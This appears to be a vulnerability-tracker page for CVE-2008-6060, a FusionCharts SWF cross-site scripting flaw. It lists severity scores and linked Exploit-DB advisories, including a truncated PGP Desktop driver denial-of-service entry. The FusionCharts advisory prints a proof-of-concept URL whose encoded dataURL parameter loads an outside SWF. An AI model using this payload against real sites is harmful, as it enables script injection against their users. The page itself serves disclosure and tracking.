CVE-2008-6060
published 2009-02-05CVE-2008-6060: Cross-site scripting (XSS) vulnerability in ActionScript in arbitrary Shockwave Flash (SWF) files created by InfoSoft FusionCharts allows remote attackers to…
PriorityP421medium4.3CVSS 2.0
AVNACMAuNCNIPAN
EXPLOIT
EPSS
2.05%
78.9th percentile
Cross-site scripting (XSS) vulnerability in ActionScript in arbitrary Shockwave Flash (SWF) files created by InfoSoft FusionCharts allows remote attackers to inject arbitrary additional SWF content via a URL in the SRC attribute of an IMG element in the dataURL parameter.
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
PGP Desktop 9.0.6 - 'PGPwded.sys' Local Denial of Service
exploitdb·2008-12-23
CVE-2008-5731 PGP Desktop 9.0.6 - 'PGPwded.sys' Local Denial of Service
PGP Desktop 9.0.6 - 'PGPwded.sys' Local Denial of Service
---
--------------------------[PGP Desktop 9.0.6 Denial Of Service]--------------->
Author: Giuseppe 'Evilcry' Bonfa'
E-Mail: evilcry {AT} GMAIL {DOT} COM
Profile: http://evilcry.netsons.org
Website: http://evilfingers.com/
Release Date: 23/12/2008
+-------------------------------------------------+
Product: PGP Desktop 9.0.6 [Build 6060] (other version could be affected)
Affected Component: PGPwded.sys
Category: Local Denial of Service (BSOD)
(untested) Local Privilege Escalation
+-------------------------------------------------+
--------------------------[Details]--------------->
PGP Desktop 's PGPweded.sys Driver does not sanitize user supplied input (IOCTL)
and this lead to a Driver Collapse that propagates on the syst
Exploit-DB
InfoSoft FusionCharts 3 - '.swf' Flash File Remote Code Execution
exploitdb·2008-01-02
CVE-2008-6060 InfoSoft FusionCharts 3 - '.swf' Flash File Remote Code Execution
InfoSoft FusionCharts 3 - '.swf' Flash File Remote Code Execution
---
source: https://www.securityfocus.com/bid/27109/info
InfoSoft FusionCharts is prone to a remote code-execution vulnerability because the application fails to properly sanitize user-supplied input.
An attacker can exploit this issue to execute malicious script code in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.
http://www.example.com/Example.swf?debugMode=1&dataURL=%27%3E%3Cimg+src%3D%22http%3A//www.example2.com/DoKnowEvil.swf%3F.jpg%22%3E
No writeups or analysis indexed.
http://docs.google.com/View?docid=ajfxntc4dmsq_14dt57ssdwhttp://www.kb.cert.org/vuls/id/249337http://www.securityfocus.com/archive/1/485722/100/100/threadedhttp://www.securityfocus.com/bid/27109http://www.vupen.com/english/advisories/2008/0067http://docs.google.com/View?docid=ajfxntc4dmsq_14dt57ssdwhttp://www.kb.cert.org/vuls/id/249337http://www.securityfocus.com/archive/1/485722/100/100/threadedhttp://www.securityfocus.com/bid/27109http://www.vupen.com/english/advisories/2008/0067
2009-02-05
Published